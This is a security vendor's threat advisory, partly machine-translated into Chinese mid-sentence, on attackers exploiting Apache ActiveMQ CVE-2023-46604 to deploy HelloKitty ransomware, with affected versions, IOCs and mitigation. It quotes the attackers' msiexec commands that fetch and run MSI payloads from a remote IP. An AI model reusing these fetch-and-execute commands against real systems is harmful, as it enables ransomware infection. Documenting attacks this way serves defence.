Last updated at Fri, 03 Nov 2023 18:32:32 GMT
Tom Elkins, John Fenninger, Evan McCann, Matthew Smith, Micah Young为本博客提供了攻击者行为的见解.
Beginning Friday, October 27, Rapid7管理检测和响应(MDR)在两个不同的客户环境中发现了可疑的Apache ActiveMQ CVE-2023-46604漏洞. In both instances, 攻击者试图在目标系统上部署勒索软件二进制文件,以勒索受害组织. Based on the ransom note and available evidence, 我们将此事件归因于HelloKitty勒索软件家族, whose source code was leaked on a forum in early October. Rapid7在受影响的客户环境中观察到类似的妥协指标, 它们都在运行过时版本的Apache ActiveMQ.
CVE-2023-46604 is a remote code execution vulnerability 在Apache ActiveMQ中,允许具有网络访问代理的远程攻击者“通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而使代理实例化类路径上的任何类.“这是我们见过的比较复杂的漏洞描述之一,但是 root cause of the issue is insecure deserialization.
Apache disclosed the vulnerability and released new versions of ActiveMQ on October 25, 2023. Proof-of-concept exploit code and vulnerability details are both publicly available. Rapid7的漏洞研究团队已经测试了公共PoC,并确认MDR在客户环境中观察到的行为与我们对CVE-2023-46604漏洞的期望相似. Rapid7 research has a technical analysis of the vulnerability in AttackerKB.
Affected Products
According to Apache’s advisory, CVE-2023-46604 affects the following:
- Apache ActiveMQ 5.18.0 before 5.18.3
- Apache ActiveMQ 5.17.0 before 5.17.6
- Apache ActiveMQ 5.16.0 before 5.16.7
- Apache ActiveMQ before 5.15.16
- Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
- Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
- Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
- Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
Observed Attacker Behavior
During a successful exploitation of the vulnerability, Java.exe 将包含被攻击的特定Apache应用程序——在这种情况下, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64,在这两起事件中都观察到这是父过程. 利用后,攻击者试图加载名为 M2.png and M4.png using MSIExec. 威胁行为者部署勒索软件的尝试有些笨拙:在Rapid7观察到的一个事件中, 加密资产的尝试有六次以上没有成功.
HelloKitty Ransomware Details
Rapid7 acquired the MSI files M4.png and M2.png from the domain 172.245.16[.]125 and analyzed them in a controlled environment. 经过分析,Rapid7观察到两个MSI文件都包含32位 .NET executable internally named dllloader. Within the .NET executable dllloader, Rapid7发现可执行文件加载base64编码的有效负载. 我们解码了base64编码的有效负载,并确定它是32位的 .NET DLL named EncDLL.
The EncDLL 二进制包含类似于勒索软件的功能- DLL搜索特定的进程并阻止它们运行. Rapid7观察到DLL将使用 RSACryptoServiceProvider function, appending encrypted files with the extension .locked. 我们还观察了另一个函数,该函数提供了有关避免对哪些目录进行加密的信息, a static variable assigned with the ransomware note, 以及尝试与HTTP服务器通信的函数, 172.245.16[.]125.
勒索软件说明表明通信应该通过电子邮件地址进行 service@hellokittycat[.]online.
Indicators of Compromise
Rapid7的漏洞研究团队分析了CVE-2023-46604和可用的公共漏洞代码. In our test setup, activemq.log 成功利用CVE-2023-46604的单行入口:
2023-10-31 05:04:58 . 736 | WARN |传输连接:tcp://192.168.86.35:15871 failed: java.net.SocketException:一个已建立的连接被你的主机上的软件中止了.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616
In the above example, the attacker’s (i.e., the researcher's) IP was 192.168.86.35, and the target TCP port was 61616. 根据可以修改的日志记录设置,可能会有更多或更少的信息可用.
Other IOCs:
- http://172.245.16[.]125/m2.png
- http://172.245.16[.]125/m4.png
Files dropped and executed via the msiexec command:
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
以下文件哈希值是从域172下载的两个MSI包的一部分.245.16[.]125:
M2.msi: 8177455 ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4M4.msi: 8 c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7EncDll: 3 e65437f910f1f4e93809b81c19942ef74aa250ae228caca0b278fc523ad47c5
Mitigation Guidance
组织应尽快更新到固定版本的ActiveMQ,并在其环境中寻找折衷的指标. Apache-supplied updates are available here. Apache还提供了有关改进ActiveMQ实现安全性的信息 here.
Rapid7 Customers
Rapid7 MDR, InsightIDR, 和MTC (Managed Threat Complete)客户部署了以下规则,并对与此威胁相关的利用后活动发出警报. Rapid7建议确保Insight Agent部署到客户环境中的所有适用资产中:
- 可疑进程- Apache ActiveMQ启动CMD进程
- Attacker Technique - MSIExec loading object via HTTP
- 可疑进程-卷阴影服务删除阴影副本
InsightVM和expose的客户可以使用11月1日发布的Windows认证漏洞检查来评估他们对CVE-2023-46604的暴露.
Updates
November 2, 2023: 更新以反映InsightVM内容的可用性,并纠正IOC拼写错误(哈希中缺少字符) EncDll, incorrect character in one of the files dropped).
